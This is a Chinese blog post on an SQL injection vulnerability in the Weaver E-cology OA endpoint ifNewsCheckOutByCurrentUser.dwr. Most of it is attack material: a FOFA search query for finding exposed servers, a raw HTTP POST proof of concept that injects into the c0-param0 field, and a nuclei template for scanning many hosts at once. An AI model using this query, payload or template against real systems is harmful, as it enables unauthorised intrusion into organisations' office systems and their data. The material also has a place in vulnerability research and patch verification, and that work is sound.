首页 > 数据库 >泛微E-cology ifNewsCheckOutByCurrentUser.dwr SQL注入漏洞

泛微E-cology ifNewsCheckOutByCurrentUser.dwr SQL注入漏洞

时间:2023-09-02 16:22:45浏览次数:42  
标签:dwr string 漏洞 ifNewsCheckOutByCurrentUser cology c0 泛微

漏洞描述

泛微E-cology的ifNewsCheckOutByCurrentUser.dwr文件存在SQL注入漏洞。

漏洞复现

fofa语法:app="泛微-协同办公OA"
登录页面如下:

POC:

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/35.0.2117.157 Safari/537.36
Content-Length: 189
Accept-Encoding: gzip
Connection: close
Content-Type: text/plain

callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 and 1=1
c0-param1=string:1
batchId=0


nuclei批量yaml文件

id: ecology_ifNewsCheckOutByCurrentUser_sqli
info:
  name: 泛微E-cology ifNewsCheckOutByCurrentUser.dwr SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |-
        POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/35.0.2117.157 Safari/537.36
        Content-Length: 189
        Accept-Encoding: gzip
        Connection: close
        Content-Type: text/plain

        callCount=1
        page=
        httpSessionId=
        scriptSessionId=
        c0-scriptName=DocDwrUtil
        c0-methodName=ifNewsCheckOutByCurrentUser
        c0-id=0
        c0-param0=string:1 and 1=1
        c0-param1=string:1
        batchId=0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - remoteHandleCallback
      - type: word
        part: header
        words:
          - '200'

标签:dwr,string,漏洞,ifNewsCheckOutByCurrentUser,cology,c0,泛微
From: https://www.cnblogs.com/pursue-security/p/17673809.html

相关文章

  • WdWrapType 枚举 (Word)
    指定如何在形状周围环绕文字。https://learn.microsoft.com/zh-cn/office/vba/api/word.wdwraptype名称值DescriptionwdWrapInline7将形状嵌入到文字中。wdWrapNone3将形状放在文字前面。请参阅 wdWrapFront 。wdWrapSquare0使文字环绕形状。线条延......
  • Oracle EBS查看请求日志报404 not found错误,FNDWRR.exe资源访问不存在
    问题描述如上图中,查看请求时,点击“查看日志”按钮后,正常浏览器会打开一个页面,可以看到这个请求的日志,但出现问题后,浏览器会报404错误,如下图解决方法cd$EBS_ORACLE_HOME/common/scripts实际目录:(/oracle/PROD/fs1/FMW_Home/Oracle_EBS-app1/common/scripts)请根据自己的目......
  • DWR util.js 整理(DWR 处理各种form表单Select/option,table等,
    /********************/util.js包含一些有用的函数function,用于在客户端页面调用.主要功能如下:代码$()获得页面参数值addOptionsandremoveAllOptions初始化下拉框addRowsandremoveAllRows填充表格getText取得text属性值getValue取得form表......
  • DWR跨域访问配置
    DWR跨域访问的实现是从2.0开始的具体配置如下:web.xml中:<servlet><servlet-name>dwr-invoker</servlet-name><servlet-class>org.directwebremoting.servlet.DwrServlet</servlet-class><init-param><param-name>debug</pa......
  • DWR的注释(annotations)使用及反向调用(Reverse Ajax)
    先说说注释语法,省掉dwr.xml。(自从用了java5之后,现在越看一堆堆的配置文件越烦,越来越喜欢注释方式来的直接简单了)  首先下载最新的稳定版本的dwr.jar文件放到你的工程中。(还有需要其它的吗?不需要了,dwr就是这么简单)然后在web.xml中添加如下一段<!--DWRServlet--><servle......
  • DWR、Java 和 Dojo 工具箱集成 Java 和 JavaScript
    2008年8月29日您能很快地说出多少Java™Web开发框架、库和工具箱?没错,数量太多,以至于很难弄清楚它们各自的功能以及哪个功能可以真正帮助您解决问题。但是,如果您从事的是Ajax开发,那么您必须要知道这个库:DirectWebRemoting(DWR)。它利用Java语言和JavaWeb技术大大......
  • 【看表情包学Linux】系统下的文件操作 | 文件系统接口 | 系统调用与封装 | open,write
      ......
  • 2、【java线程及线程池系列】synchronized、ReentrantLock和ReentrantReadWriteLock介
    java线程及线程池系列文章1、【java线程及线程池系列】java线程及线程池概念详解2、【java线程及线程池系列】synchronized、ReentrantLock和ReentrantReadWriteLock介绍及示例3、【java线程及线程池系列】线程池ThreadPoolExecutor的类结构、使用方式示例、线程池数量配置原则和......
  • 泛微ecology FileDownloadForOutDoc-前台sql注入
    厂商发布漏洞补丁Ecology_security_20230707_v9.0_v10.58.0.ziphttps://www.weaver.com.cn/cs/package/Ecology_security_20230707_v9.0_v10.58.0.zip?v=2023070700分析补丁文件ecology\WEB-INF\myclasses\weaver\security\rules\ruleImp\SecurityRuleForOutDocForSql.class......
  • What are the differences between in vivo and in vitro testing of drugs for toxic
    Intoxicologystudies,therearetwomaintypesoftestsusedtoassessthesafetyandpotentialtoxiceffectsofdrugs:invivotestsandinvitrotests.Weknowthatthetraditionalmethodofdrugtoxicologyresearchistouseanimalmodelsforinvivo......